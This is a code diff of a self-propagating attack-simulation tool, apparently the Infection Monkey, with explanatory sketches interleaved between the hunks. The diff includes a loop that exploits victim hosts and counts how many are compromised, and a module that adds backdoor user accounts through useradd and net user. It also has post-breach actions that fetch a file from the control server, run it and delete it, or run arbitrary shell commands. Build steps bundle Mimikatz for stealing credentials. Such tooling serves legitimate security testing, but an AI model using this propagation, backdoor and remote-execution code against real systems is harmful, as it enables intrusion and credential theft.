+        :return: True if successfully exploited, False otherwise
+        """
+        if not exploiter.is_os_supported():
+            LOG.info("Skipping exploiter %s host:%r, os is not supported",
+                     exploiter.__class__.__name__, machine)
+            return False
+
+        LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
+
+        result = False
+        try:
+            result = exploiter.exploit_host()
+            if result:
+                self.successfully_exploited(machine, exploiter)
+                return True
+            else:
+                LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
+
+        except Exception as exc:
+            LOG.exception("Exception while attacking %s using %s: %s",
+                          machine, exploiter.__class__.__name__, exc)
+        finally:
+            exploiter.send_exploit_telemetry(result)
+        return False
+
+    def successfully_exploited(self, machine, exploiter):
+        """
+        Workflow of registering successfully exploited machine
+        :param machine: machine that was exploited
+        :param exploiter: exploiter that succeeded
+        """
+        self._exploited_machines.add(machine)
+
+        LOG.info("Successfully propagated to %s using %s",
+                 machine, exploiter.__class__.__name__)
+
+        # check if max-exploitation limit is reached
+        if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
+            self._keep_running = False
+
+            LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
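Conceptually, the refactor replaces the inline loop with the two helpers above: exploiters are sorted by their new EXPLOIT_TYPE value and each is tried until one succeeds. A self-contained sketch of that ordering-and-retry flow (the enum values and FakeExploiter are assumptions for illustration; on Python 2 the enum module comes from the enum34 package):

    from enum import Enum   # assumption: mirrors common.utils.exploit_enum.ExploitType

    class ExploitType(Enum):
        VULNERABILITY = 1   # assumed value: vulnerability-based exploits run first
        BRUTE_FORCE = 9     # assumed value: brute-force exploits run last

    class FakeExploiter(object):
        EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
        def __init__(self, machine):
            self.machine = machine
        def is_os_supported(self):
            return True
        def exploit_host(self):
            return False    # pretend the attempt failed

    def attack(machine, exploiter_classes):
        # Order exploits according to their type, then try each until one works
        ordered = sorted(exploiter_classes, key=lambda cls: cls.EXPLOIT_TYPE.value)
        for exploiter in (cls(machine) for cls in ordered):
            if exploiter.is_os_supported() and exploiter.exploit_host():
                return True
        return False

    print(attack('10.0.0.7', [FakeExploiter]))   # -> False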
@@ -2,39 +2,120 @@
 import os
 import platform

+__author__ = 'itay.mizeretz'
+
+block_cipher = None
+
 # Name of zip file in monkey. That's the name of the file in the _MEI folder
 MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'


+def main():
+    a = Analysis(['main.py'],
+                 pathex=['..'],
+                 hiddenimports=get_hidden_imports(),
+                 hookspath=None,
+                 runtime_hooks=None,
+                 binaries=None,
+                 datas=None,
+                 excludes=None,
+                 win_no_prefer_redirects=None,
+                 win_private_assemblies=None,
+                 cipher=block_cipher
+                 )
+
+    a.binaries += get_binaries()
+    a.datas = process_datas(a.datas)
+
+    pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)
+    exe = EXE(pyz,
+              a.scripts,
+              a.binaries,
+              a.zipfiles,
+              a.datas,
+              name=get_monkey_filename(),
+              debug=False,
+              strip=get_exe_strip(),
+              upx=True,
+              console=True,
+              icon=get_exe_icon())
+
+
+def is_windows():
+    return platform.system().find("Windows") >= 0
+
+
+def is_32_bit():
+    return platform.architecture()[0] == "32bit"
+
+
+def get_bin_folder():
+    return os.path.join('.', 'bin')
+
+
+def get_bin_file_path(filename):
+    return os.path.join(get_bin_folder(), filename)
+
+
+def process_datas(orig_datas):
+    datas = orig_datas
+    if is_windows():
+        datas = [i for i in datas if i[0].find('Include') < 0]
+        datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
+    return datas
+
+
+def get_binaries():
+    binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries()
+    binaries += get_sc_binaries()
+    return binaries
+
+
+def get_windows_only_binaries():
+    binaries = []
+    binaries += get_msvcr()
+    return binaries
+
+
+def get_linux_only_binaries():
+    binaries = []
+    binaries += get_traceroute_binaries()
+    return binaries
+
+
+def get_hidden_imports():
+    return ['_cffi_backend', 'queue', '_mssql'] if is_windows() else ['_cffi_backend','_mssql']
+
+
+def get_sc_binaries():
+    return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']]
+
+
+def get_msvcr():
+    return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')]
+
+
+def get_traceroute_binaries():
+    traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64'
+    return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')]
+
+
+def get_monkey_filename():
+    return 'monkey.exe' if is_windows() else 'monkey'
+
+
+def get_exe_strip():
+    return not is_windows()
+
+
+def get_exe_icon():
+    return 'monkey.ico' if is_windows() else None
+
+
 def get_mimikatz_zip_path():
-    if platform.architecture()[0] == "32bit":
-        return '.\\bin\\mk32.zip'
-    else:
-        return '.\\bin\\mk64.zip'
+    mk_filename = 'mk32.zip' if is_32_bit() else 'mk64.zip'
+    return os.path.join(get_bin_folder(), mk_filename)


-a = Analysis(['main.py'],
-             pathex=['..'],
-             hiddenimports=['_cffi_backend', 'queue'],
-             hookspath=None,
-             runtime_hooks=None)
-
-a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
-a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
-
-if platform.system().find("Windows") >= 0:
-    a.datas = [i for i in a.datas if i[0].find('Include') < 0]
-    a.datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
-
-pyz = PYZ(a.pure)
-exe = EXE(pyz,
-          a.scripts,
-          a.binaries + [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')],
-          a.zipfiles,
-          a.datas,
-          name='monkey.exe',
-          debug=False,
-          strip=None,
-          upx=True,
-          console=True,
-          icon='monkey.ico')
+main()  # We don't check if __main__ because this isn't the main script.
@@ -6,6 +6,7 @@ from infection_monkey.config import WormConfiguration
 from infection_monkey.network.info import local_ips, get_interfaces_ranges
 from infection_monkey.model import VictimHost
 from infection_monkey.network import HostScanner
+from infection_monkey.network import TcpScanner, PingScanner

 __author__ = 'itamar'

@@ -62,7 +63,7 @@ class NetworkScanner(object):

         return subnets_to_scan

-    def get_victim_machines(self, scan_type, max_find=5, stop_callback=None):
+    def get_victim_machines(self, max_find=5, stop_callback=None):
         """
         Finds machines according to the ranges specified in the object
         :param scan_type: A hostscanner class, will be instanced and used to scan for new machines

@@ -70,16 +71,18 @@ class NetworkScanner(object):
         :param stop_callback: A callback to check at any point if we should stop scanning
         :return: yields a sequence of VictimHost instances
         """
-        if not scan_type:
-            return
-
-        scanner = scan_type()
+        TCPscan = TcpScanner()
+        Pinger = PingScanner()
         victims_count = 0

         for net_range in self._ranges:
             LOG.debug("Scanning for potential victims in the network %r", net_range)
             for ip_addr in net_range:
-                victim = VictimHost(ip_addr)
+                if hasattr(net_range, 'domain_name'):
+                    victim = VictimHost(ip_addr, net_range.domain_name)
+                else:
+                    victim = VictimHost(ip_addr)
                 if stop_callback and stop_callback():
                     LOG.debug("Got stop signal")
                     break

@@ -94,9 +97,11 @@ class NetworkScanner(object):
                     continue

                 LOG.debug("Scanning %r...", victim)
+                pingAlive = Pinger.is_host_alive(victim)
+                tcpAlive = TCPscan.is_host_alive(victim)

                 # if scanner detect machine is up, add it to victims list
-                if scanner.is_host_alive(victim):
+                if pingAlive or tcpAlive:
                     LOG.debug("Found potential victim: %r", victim)
                     victims_count += 1
                     yield victim

@@ -106,8 +111,9 @@ class NetworkScanner(object):

                     break

-                if SCAN_DELAY:
-                    time.sleep(SCAN_DELAY)
+                if WormConfiguration.tcp_scan_interval:
+                    # time.sleep uses seconds, while config is in milliseconds
+                    time.sleep(WormConfiguration.tcp_scan_interval/float(1000))

     @staticmethod
     def _is_any_ip_in_subnet(ip_addresses, subnet_str):
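With the scanner_class parameter gone, callers simply ask the scanner for victims and it ping-sweeps and TCP-probes each address itself. A usage sketch matching the new signature (assuming the infection_monkey package and its configuration are importable):

    from infection_monkey.network.network_scanner import NetworkScanner

    scanner = NetworkScanner()
    scanner.initialize()                                    # builds the ranges to scan
    for victim in scanner.get_victim_machines(max_find=5, stop_callback=None):
        print("Potential victim: %r" % victim)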
@@ -59,9 +59,9 @@ class PingScanner(HostScanner, HostFinger):
         if regex_result:
             try:
                 ttl = int(regex_result.group(0))
-                if LINUX_TTL == ttl:
+                if ttl <= LINUX_TTL:
                     host.os['type'] = 'linux'
-                elif WINDOWS_TTL == ttl:
+                else:  # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
                     host.os['type'] = 'windows'
                 return True
             except Exception as exc:
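The TTL comparison above amounts to a one-line heuristic: replies whose TTL is at or below the typical Linux default are treated as Linux-like, anything higher is assumed to be Windows. A sketch (the constant value of 64 is the conventional Linux default and an assumption here):

    LINUX_TTL = 64  # assumed default; Windows stacks usually reply with an initial TTL of 128

    def guess_os_from_ttl(ttl):
        # Mirrors the PingScanner logic above: <= 64 -> linux-like, otherwise windows
        return 'linux' if ttl <= LINUX_TTL else 'windows'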
@@ -9,9 +9,13 @@ import re

 from six.moves import range

+from infection_monkey.pyinstaller_utils import get_binary_file_path
+from infection_monkey.utils import is_64bit_python
+
 DEFAULT_TIMEOUT = 10
 BANNER_READ = 1024
-IP_ADDR_RE = r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
+IP_ADDR_RE = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
+IP_ADDR_PARENTHESES_RE = r'\(' + IP_ADDR_RE + r'\)'

 LOG = logging.getLogger(__name__)
 SLEEP_BETWEEN_POLL = 0.5

@@ -175,9 +179,10 @@ def tcp_port_to_service(port):
     return 'tcp-' + str(port)


-def traceroute(target_ip, ttl):
+def traceroute(target_ip, ttl=64):
     """
     Traceroute for a specific IP/name.
+    Note, may throw exception on failure that should be handled by caller.
     :param target_ip: IP/name of target
     :param ttl: Max TTL
     :return: Sequence of IPs in the way

@@ -188,6 +193,53 @@ def traceroute(target_ip, ttl):
         return _traceroute_linux(target_ip, ttl)


+def _get_traceroute_bin_path():
+    """
+    Gets the path to the prebuilt traceroute executable
+
+    This is the traceroute utility from: http://traceroute.sourceforge.net
+    Its been built using the buildroot utility with the following settings:
+        * Statically link to musl and all other required libs
+        * Optimize for size
+    This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
+
+    :return: Path to traceroute executable
+    """
+    return get_binary_file_path("traceroute64" if is_64bit_python() else "traceroute32")
+
+
+def _parse_traceroute(output, regex, ttl):
+    """
+    Parses the output of traceroute (from either Linux or Windows)
+    :param output: The output of the traceroute
+    :param regex: Regex for finding an IP address
+    :param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
+    :return: List of ips which are the hops on the way to the traceroute destination.
+             If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
+    """
+    ip_lines = output.split('\n')
+    trace_list = []
+
+    first_line_index = None
+    for i in range(len(ip_lines)):
+        if re.search(r'^\s*1', ip_lines[i]) is not None:
+            first_line_index = i
+            break
+
+    for i in range(first_line_index, first_line_index + ttl):
+        if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None:  # If trace is finished
+            break
+
+        re_res = re.search(regex, ip_lines[i])
+        if re_res is None:
+            ip_addr = None
+        else:
+            ip_addr = re_res.group()
+        trace_list.append(ip_addr)
+
+    return trace_list
+
+
 def _traceroute_windows(target_ip, ttl):
     """
     Traceroute for a specific IP/name - Windows implementation

@@ -200,59 +252,22 @@ def _traceroute_windows(target_ip, ttl):
            target_ip]
     proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
     stdout, stderr = proc_obj.communicate()
-    ip_lines = stdout.split('\r\n')
-    trace_list = []
-
-    first_line_index = None
-    for i in range(len(ip_lines)):
-        if re.search(r'^\s*1', ip_lines[i]) is not None:
-            first_line_index = i
-            break
-
-    for i in range(first_line_index, first_line_index + ttl):
-        if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None:  # If trace is finished
-            break
-
-        re_res = re.search(IP_ADDR_RE, ip_lines[i])
-        if re_res is None:
-            ip_addr = None
-        else:
-            ip_addr = re_res.group()
-        trace_list.append(ip_addr)
-
-    return trace_list
+    stdout = stdout.replace('\r', '')
+    return _parse_traceroute(stdout, IP_ADDR_RE, ttl)


 def _traceroute_linux(target_ip, ttl):
     """
     Traceroute for a specific IP/name - Linux implementation
     """
-    # implementation note: We're currently going to just use ping.
-    # reason is, implementing a non root requiring user is complicated (see traceroute(8) code)
-    # while this is just ugly
-    # we can't use traceroute because it's not always installed
-    current_ttl = 1
-    trace_list = []
-    while current_ttl <= ttl:
-        cli = ["ping",
-               "-c", "1",
-               "-w", "1",
-               "-t", str(current_ttl),
-               target_ip]
-        proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
-        stdout, stderr = proc_obj.communicate()
-        ips = re.findall(IP_ADDR_RE, stdout)
-        if len(ips) < 2:  # Unexpected output. Fail the whole thing since it's not reliable.
-            return []
-        elif ips[-1] in trace_list:  # Failed getting this hop
-            trace_list.append(None)
-        else:
-            trace_list.append(ips[-1])
-        dest_ip = ips[0]  # first ip is dest ip. must be parsed here since it can change between pings
-
-        if dest_ip == ips[-1]:
-            break
-
-        current_ttl += 1
-
-    return trace_list
+    cli = [_get_traceroute_bin_path(),
+           "-m", str(ttl),
+           target_ip]
+    proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
+    stdout, stderr = proc_obj.communicate()
+
+    lines = _parse_traceroute(stdout, IP_ADDR_PARENTHESES_RE, ttl)
+    lines = [x[1:-1] if x else None  # Removes parenthesis
+             for x in lines]
+    return lines
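With the refactor, both platforms funnel their raw output through _parse_traceroute() and traceroute() defaults to a TTL of 64. A usage sketch (assuming the package and its bundled traceroute binaries are in place; per the docstring, failures raise and unresolved hops come back as None):

    from infection_monkey.network.tools import traceroute

    try:
        hops = traceroute('10.0.0.1', ttl=64)   # target address is illustrative
        print(hops)                             # e.g. ['192.168.1.254', None, '10.0.0.1']
    except Exception:
        hops = []                               # caller is expected to handle failures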
@@ -0,0 +1,4 @@
+__author__ = 'danielg'
+
+
+from add_user import BackdoorUser
@@ -0,0 +1,52 @@
+import datetime
+import logging
+import subprocess
+import sys
+from infection_monkey.config import WormConfiguration
+
+LOG = logging.getLogger(__name__)
+
+# Linux doesn't have WindowsError
+try:
+    WindowsError
+except NameError:
+    WindowsError = None
+
+__author__ = 'danielg'
+
+
+class BackdoorUser(object):
+    """
+    This module adds a disabled user to the system.
+    This tests part of the ATT&CK matrix
+    """
+
+    def act(self):
+        LOG.info("Adding a user")
+        try:
+            if sys.platform.startswith("win"):
+                retval = self.add_user_windows()
+            else:
+                retval = self.add_user_linux()
+            if retval != 0:
+                LOG.warn("Failed to add a user")
+            else:
+                LOG.info("Done adding user")
+        except OSError:
+            LOG.exception("Exception while adding a user")
+
+    @staticmethod
+    def add_user_linux():
+        cmd_line = ['useradd', '-M', '--expiredate',
+                    datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
+                    WormConfiguration.user_to_add]
+        retval = subprocess.call(cmd_line)
+        return retval
+
+    @staticmethod
+    def add_user_windows():
+        cmd_line = ['net', 'user', WormConfiguration.user_to_add,
+                    WormConfiguration.remote_user_pass,
+                    '/add', '/ACTIVE:NO']
+        retval = subprocess.call(cmd_line)
+        return retval
@@ -0,0 +1,68 @@
+from infection_monkey.post_breach.pba import PBA
+from infection_monkey.control import ControlClient
+from infection_monkey.config import WormConfiguration
+from infection_monkey.utils import get_monkey_dir_path
+import requests
+import os
+import logging
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+# Default commands for executing PBA file and then removing it
+DEFAULT_LINUX_COMMAND = "chmod +x {0} ; {0} ; rm {0}"
+DEFAULT_WINDOWS_COMMAND = "{0} & del {0}"
+
+
+class FileExecution(PBA):
+    """
+    Defines user's file execution post breach action.
+    """
+    def __init__(self, linux_command="", windows_command=""):
+        self.linux_filename = WormConfiguration.PBA_linux_filename
+        self.windows_filename = WormConfiguration.PBA_windows_filename
+        super(FileExecution, self).__init__("File execution", linux_command, windows_command)
+
+    def _execute_linux(self):
+        FileExecution.download_PBA_file(get_monkey_dir_path(), self.linux_filename)
+        return super(FileExecution, self)._execute_linux()
+
+    def _execute_win(self):
+        FileExecution.download_PBA_file(get_monkey_dir_path(), self.windows_filename)
+        return super(FileExecution, self)._execute_win()
+
+    def add_default_command(self, is_linux):
+        """
+        Replaces current (likely empty) command with default file execution command (that changes permissions, executes
+        and finally deletes post breach file).
+        Default commands are defined as globals in this module.
+        :param is_linux: Boolean that indicates for which OS the command is being set.
+        """
+        if is_linux:
+            file_path = os.path.join(get_monkey_dir_path(), self.linux_filename)
+            self.linux_command = DEFAULT_LINUX_COMMAND.format(file_path)
+        else:
+            file_path = os.path.join(get_monkey_dir_path(), self.windows_filename)
+            self.windows_command = DEFAULT_WINDOWS_COMMAND.format(file_path)
+
+    @staticmethod
+    def download_PBA_file(dst_dir, filename):
+        """
+        Handles post breach action file download
+        :param dst_dir: Destination directory
+        :param filename: Filename
+        :return: True if successful, false otherwise
+        """
+        PBA_file_contents = requests.get("https://%s/api/pba/download/%s" %
+                                         (WormConfiguration.current_server, filename),
+                                         verify=False,
+                                         proxies=ControlClient.proxies)
+        try:
+            with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file:
+                written_PBA_file.write(PBA_file_contents.content)
+            return True
+        except IOError as e:
+            LOG.error("Can not download post breach file to target machine, because %s" % e)
+            return False
@@ -0,0 +1,68 @@
+import logging
+from infection_monkey.control import ControlClient
+import subprocess
+import socket
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+
+class PBA(object):
+    """
+    Post breach action object. Can be extended to support more than command execution on target machine.
+    """
+    def __init__(self, name="unknown", linux_command="", windows_command=""):
+        """
+        :param name: Name of post breach action.
+        :param linux_command: Command that will be executed on linux machine
+        :param windows_command: Command that will be executed on windows machine
+        """
+        self.linux_command = linux_command
+        self.windows_command = windows_command
+        self.name = name
+
+    def run(self, is_linux):
+        """
+        Runs post breach action command
+        :param is_linux: boolean that indicates on which os monkey is running
+        """
+        if is_linux:
+            command = self.linux_command
+            exec_funct = self._execute_linux
+        else:
+            command = self.windows_command
+            exec_funct = self._execute_win
+        if command:
+            hostname = socket.gethostname()
+            ControlClient.send_telemetry('post_breach', {'command': command,
+                                                         'result': exec_funct(),
+                                                         'name': self.name,
+                                                         'hostname': hostname,
+                                                         'ip': socket.gethostbyname(hostname)
+                                                         })
+
+    def _execute_linux(self):
+        """
+        Default linux PBA execution function. Override it if additional functionality is needed
+        """
+        return self._execute_default(self.linux_command)
+
+    def _execute_win(self):
+        """
+        Default windows PBA execution function. Override it if additional functionality is needed
+        """
+        return self._execute_default(self.windows_command)
+
+    @staticmethod
+    def _execute_default(command):
+        """
+        Default post breach command execution routine
+        :param command: What command to execute
+        :return: Tuple of command's output string and boolean, indicating if it succeeded
+        """
+        try:
+            return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True), True
+        except subprocess.CalledProcessError as e:
+            # Return error output of the command
+            return e.output, False
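A minimal usage sketch of the PBA class above (the command strings are illustrative; the telemetry call assumes the island is reachable):

    from infection_monkey.post_breach.pba import PBA

    pba = PBA(name="List temp dir",
              linux_command="ls /tmp",
              windows_command="dir %TEMP%")
    pba.run(is_linux=True)   # executes linux_command via the default routine and reports 'post_breach' telemetry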
@@ -0,0 +1,83 @@
+import logging
+import infection_monkey.config
+from file_execution import FileExecution
+from pba import PBA
+from infection_monkey.utils import is_windows_os
+from infection_monkey.utils import get_monkey_dir_path
+
+LOG = logging.getLogger(__name__)
+
+__author__ = 'VakarisZ'
+
+DIR_CHANGE_WINDOWS = 'cd %s & '
+DIR_CHANGE_LINUX = 'cd %s ; '
+
+
+class PostBreach(object):
+    """
+    This class handles post breach actions execution
+    """
+    def __init__(self):
+        self.os_is_linux = not is_windows_os()
+        self.pba_list = self.config_to_pba_list(infection_monkey.config.WormConfiguration)
+
+    def execute(self):
+        """
+        Executes all post breach actions.
+        """
+        for pba in self.pba_list:
+            pba.run(self.os_is_linux)
+        LOG.info("Post breach actions executed")
+
+    @staticmethod
+    def config_to_pba_list(config):
+        """
+        Returns a list of PBA objects generated from config.
+        :param config: Monkey configuration
+        :return: A list of PBA objects.
+        """
+        pba_list = []
+        pba_list.extend(PostBreach.get_custom_PBA(config))
+        return pba_list
+
+    @staticmethod
+    def get_custom_PBA(config):
+        """
+        Creates post breach actions depending on users input into 'custom post breach' config section
+        :param config: monkey's configuration
+        :return: List of PBA objects ([user's file execution PBA, user's command execution PBA])
+        """
+        custom_list = []
+        file_pba = FileExecution()
+        command_pba = PBA(name="Custom")
+
+        if not is_windows_os():
+            # Add linux commands to PBA's
+            if config.PBA_linux_filename:
+                if config.custom_PBA_linux_cmd:
+                    # Add change dir command, because user will try to access his file
+                    file_pba.linux_command = (DIR_CHANGE_LINUX % get_monkey_dir_path()) + config.custom_PBA_linux_cmd
+                else:
+                    file_pba.add_default_command(is_linux=True)
+            elif config.custom_PBA_linux_cmd:
+                command_pba.linux_command = config.custom_PBA_linux_cmd
+        else:
+            # Add windows commands to PBA's
+            if config.PBA_windows_filename:
+                if config.custom_PBA_windows_cmd:
+                    # Add change dir command, because user will try to access his file
+                    file_pba.windows_command = (DIR_CHANGE_WINDOWS % get_monkey_dir_path()) + \
+                                               config.custom_PBA_windows_cmd
+                else:
+                    file_pba.add_default_command(is_linux=False)
+            elif config.custom_PBA_windows_cmd:
+                command_pba.windows_command = config.custom_PBA_windows_cmd
+
+        # Add PBA's to list
+        if file_pba.linux_command or file_pba.windows_command:
+            custom_list.append(file_pba)
+        if command_pba.windows_command or command_pba.linux_command:
+            custom_list.append(command_pba)
+
+        return custom_list
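Putting the handler together: the monkey builds the PBA list from WormConfiguration (PBA_linux_filename / PBA_windows_filename for an uploaded file, custom_PBA_linux_cmd / custom_PBA_windows_cmd for a raw command) and then runs everything for the current OS. A usage sketch, as wired up in monkey.py above:

    from infection_monkey.post_breach.post_breach_handler import PostBreach

    post_breach = PostBreach()   # reads the custom PBA fields from WormConfiguration
    post_breach.execute()        # runs each configured action and logs "Post breach actions executed"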
@ -1,40 +1,34 @@
|
||||||
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
||||||
If you only want to monkey from scratch you may refer to the instructions below.
|
If you only want to build monkey from scratch you may reference instructions below.
|
||||||
|
|
||||||
The monkey is composed of three separate parts.
|
The monkey is composed of three separate parts.
|
||||||
* The Infection Monkey itself - PyInstaller compressed python archives
|
* The Infection Monkey itself - PyInstaller compressed python archives
|
||||||
* Sambacry binaries - Two linux binaries, 32/64 bit.
|
* Sambacry binaries - Two linux binaries, 32/64 bit.
|
||||||
* Mimikatz binaries - Two windows binaries, 32/64 bit.
|
* Mimikatz binaries - Two windows binaries, 32/64 bit.
|
||||||
|
* Traceroute binaries - Two linux binaries, 32/64bit.
|
||||||
|
|
||||||
--- Windows ---
|
--- Windows ---
|
||||||
|
|
||||||
1. Install python 2.7. Preferably you should use ActiveState Python which includes pywin32 built in.
|
1. Install python 2.7.15
|
||||||
You must use an up to date version, at least version 2.7.10
|
Download and install from: https://www.python.org/downloads/release/python-2715/
|
||||||
https://www.python.org/download/releases/2.7/
|
2. Add python directories to PATH environment variable (if you didn't install ActiveState Python)
|
||||||
2. Install pywin32 (if you didn't install ActiveState Python)
|
|
||||||
Install pywin32, minimum build 219
|
|
||||||
http://sourceforge.net/projects/pywin32/files/pywin32
|
|
||||||
3. Add python directories to PATH environment variable (if you didn't install ActiveState Python)
|
|
||||||
a. Run the following command on a cmd console (Replace C:\Python27 with your python directory if it's different)
|
a. Run the following command on a cmd console (Replace C:\Python27 with your python directory if it's different)
|
||||||
setx /M PATH "%PATH%;C:\Python27;C:\Pytohn27\Scripts
|
setx /M PATH "%PATH%;C:\Python27;C:\Python27\Scripts
|
||||||
b. Close the console, make sure you execute all commands in a new cmd console from now on.
|
b. Close the console, make sure you execute all commands in a new cmd console from now on.
|
||||||
4. Install pip
|
3. Install further dependencies
|
||||||
a. Download and run the pip installer
|
|
||||||
https://bootstrap.pypa.io/get-pip.py
|
|
||||||
5. Install further dependencies
|
|
||||||
a. install VCForPython27.msi
|
a. install VCForPython27.msi
|
||||||
https://aka.ms/vcpython27
|
https://aka.ms/vcpython27
|
||||||
b. if not installed, install Microsoft Visual C++ 2010 SP1 Redistributable Package
|
b. if not installed, install Microsoft Visual C++ 2010 SP1 Redistributable Package
|
||||||
32bit: http://www.microsoft.com/en-us/download/details.aspx?id=8328
|
32bit: http://www.microsoft.com/en-us/download/details.aspx?id=8328
|
||||||
64bit: http://www.microsoft.com/en-us/download/details.aspx?id=13523
|
64bit: http://www.microsoft.com/en-us/download/details.aspx?id=13523
|
||||||
6. Download the dependent python packages using
|
4. Download the dependent python packages using
|
||||||
pip install -r requirements.txt
|
pip install -r requirements_windows.txt
|
||||||
7. Download and extract UPX binary to [source-path]\monkey\infection_monkey\bin\upx.exe:
|
5. Download and extract UPX binary to [source-path]\monkey\infection_monkey\bin\upx.exe:
|
||||||
https://github.com/upx/upx/releases/download/v3.94/upx394w.zip
|
https://github.com/upx/upx/releases/download/v3.94/upx394w.zip
|
||||||
8. Build/Download Sambacry and Mimikatz binaries
|
6. Build/Download Sambacry and Mimikatz binaries
|
||||||
a. Build/Download according to sections at the end of this readme.
|
a. Build/Download according to sections at the end of this readme.
|
||||||
b. Place the binaries under [code location]\infection_monkey\bin
|
b. Place the binaries under [code location]\infection_monkey\bin
|
||||||
9. To build the final exe:
|
7. To build the final exe:
|
||||||
cd [code location]/infection_monkey
|
cd [code location]/infection_monkey
|
||||||
build_windows.bat
|
build_windows.bat
|
||||||
output is placed under dist\monkey.exe
|
output is placed under dist\monkey.exe
|
||||||
|
@@ -48,11 +42,14 @@ Tested on Ubuntu 16.04 and 17.04.
	sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
   Install the python packages listed in requirements.txt using pip
	cd [code location]/infection_monkey
-	pip install -r requirements.txt
+	pip install -r requirements_linux.txt
2. Build Sambacry binaries
	a. Build/Download according to sections at the end of this readme.
-	b. Place the binaries under [code location]\infection_monkey\bin
-3. To build, run in terminal:
+	b. Place the binaries under [code location]\infection_monkey\bin, under the names 'sc_monkey_runner32.so', 'sc_monkey_runner64.so'
+3. Build Traceroute binaries
+	a. Build/Download according to sections at the end of this readme.
+	b. Place the binaries under [code location]\infection_monkey\bin, under the names 'traceroute32', 'traceroute64'
+4. To build, run in terminal:
	cd [code location]/infection_monkey
	chmod +x build_linux.sh
	./build_linux.sh
@@ -61,19 +58,44 @@ Tested on Ubuntu 16.04 and 17.04.
-- Sambacry --

Sambacry requires two standalone binaries to execute remotely.
-1. Install gcc-multilib if it's not installed
-	sudo apt-get install gcc-multilib
-2. Build the binaries
-	cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
-	./build.sh
+	a. Build sambacry binaries yourself
+		a.1. Install gcc-multilib if it's not installed
+			sudo apt-get install gcc-multilib
+		a.2. Build the binaries
+			cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
+			./build.sh
+
+	b. Download our pre-built sambacry binaries
+		b.1. Available here:
+			32bit: https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so
+			64bit: https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so

-- Mimikatz --

-Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from
-	https://github.com/guardicore/mimikatz/releases/tag/1.0.0
-	Download both 32 and 64 bit zipped DLLs and place them under [code location]\infection_monkey\bin
-	Alternatively, if you build Mimikatz, put each version in a zip file.
-		1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
-		2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
-		3. The zip file should be named mk32.zip/mk64.zip accordingly.
-		4. Zipping with 7zip has been tested. Other zipping software may not work.
+Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile binaries from source (requires Visual Studio 2013 and up) or download them from our repository.
+	a. Build Mimikatz yourself
+		a.0. Building mimikatz requires Visual Studio 2013 and up
+		a.1. Clone our version of mimikatz from https://github.com/guardicore/mimikatz/tree/1.1.0
+		a.2. Build using Visual Studio.
+		a.3. Put each version in a zip file
+			a.3.1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
+			a.3.2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
+			a.3.3. The zip file should be named mk32.zip/mk64.zip accordingly.
+			a.3.4. Zipping with 7zip has been tested. Other zipping software may not work.
+
+	b. Download our pre-built mimikatz binaries
+		b.1. Download both 32 and 64 bit zipped DLLs from https://github.com/guardicore/mimikatz/releases/tag/1.1.0
+		b.2. Place them under [code location]\infection_monkey\bin
+
+-- Traceroute --
+
+Traceroute requires two standalone binaries to execute remotely.
+The monkey carries the standalone binaries since traceroute isn't built in all Linux distributions.
+You can either build them yourself or download pre-built binaries.
+
+	a. Build traceroute yourself
+		a.1. The sources of traceroute are available here with building instructions: http://traceroute.sourceforge.net
+	b. Download our pre-built traceroute binaries
+		b.1. Available here:
+			32bit: https://github.com/guardicore/monkey/releases/download/1.6/traceroute32
+			64bit: https://github.com/guardicore/monkey/releases/download/1.6/traceroute64
